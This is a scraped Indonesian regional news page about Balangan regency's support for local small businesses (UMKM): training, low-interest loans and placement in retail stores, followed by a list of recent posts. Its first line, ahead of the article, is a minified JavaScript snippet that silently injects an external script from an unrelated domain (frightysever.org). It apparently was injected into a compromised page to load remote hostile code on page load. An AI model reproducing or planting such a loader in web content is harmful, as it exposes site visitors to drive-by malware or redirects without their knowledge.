(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Produk UMKM Balangan Menyasar Pasar Luar Daerah


KANALKALIMANTAN.COM, PARINGIN – Kembangkan produk daerah, sebanyak 17 Usaha Menengah Kecil Mikro (UMKM) menjadi unggulan Dinas Koperasi UMKM, Perindustrian dan Perdagangan Kabupaten Balangan. Produk UMKM dari Bumi Sanggam telah memiliki produk berkualitas dan pemasaran sudah keluar daerah.

Kepala Dinas Koperasi UMKM Perindustrian dan Perdagangan Kabupaten Balangan Aidinoor, menhatakan, ada beberapa langkah yang dilakukan untuk mengembangkan UMKM di Balangan, mulai dari pembinaan, pemberdayaan, dan pengembangan IKM, serta UMKM.

Pembinaan dilakukan langsung oleh pihaknya maupun dari provinsi dengan menjalin kerjasama pelaku UMKM. Dilihat dari kemampuan, pengembangan dan kualitas, serta produk yang bisa diterima pasar.

Pihaknya juga melakukan pemberdayaan agar pemulihan ekonomi di masa pandemi bisa segera dilakukan. Tujuannya agar pelaku UMKM bisa bertahan dan meningkatkan kualitas pada masa tersebut.

 

 

Baca juga: Donor Darah IKAPTK Banjar, Tambah Stok Bank Darah PMI

“Sementara pada segi pengembangan, kami melakukan inovasi bekerjasama dengan toko ritel modern sebagai wadah penjualan produk UMKM,” ucap Aidinnor.

Tak hanya itu, dalam waktu dekat, Dinas Koperasi UMKM Perindustrian dan Perdagangan Kabupaten Balangan bekerjasama dengan BPD Kalsel memfasilitasi pemberian pinjaman dengan bunga rendah sebagai modal bagi UMKM di Balangan.

“Sesuai arahan bupati kami juga akan meminta perluasan penempatan produk UMKM pada toko ritel modern. Sehingga tidak hanya di Balangan melainkan di luar Kalsel,” tuturnya.

Salah satu pelaku UMKM di Balangan Anita, sudah merasakan langsung bentuk pemasaran yang dilakukan oleh Pemkab Balangan terhadap sejumlah produknya di antaranya madu.

“Pemerintah daerah sangat membantu untuk promosi produk. Bahkan terkadang bisa dilibatkan dalam sejumlah kegiatan pameran untuk memasarkan produk saya,” kata Anita. (Kanalkalimantan.com/alfi)

Reporter : alfi
Editor : kk


Risa

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

2 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

3 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

4 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

5 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

8 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

9 jam ago

This website uses cookies.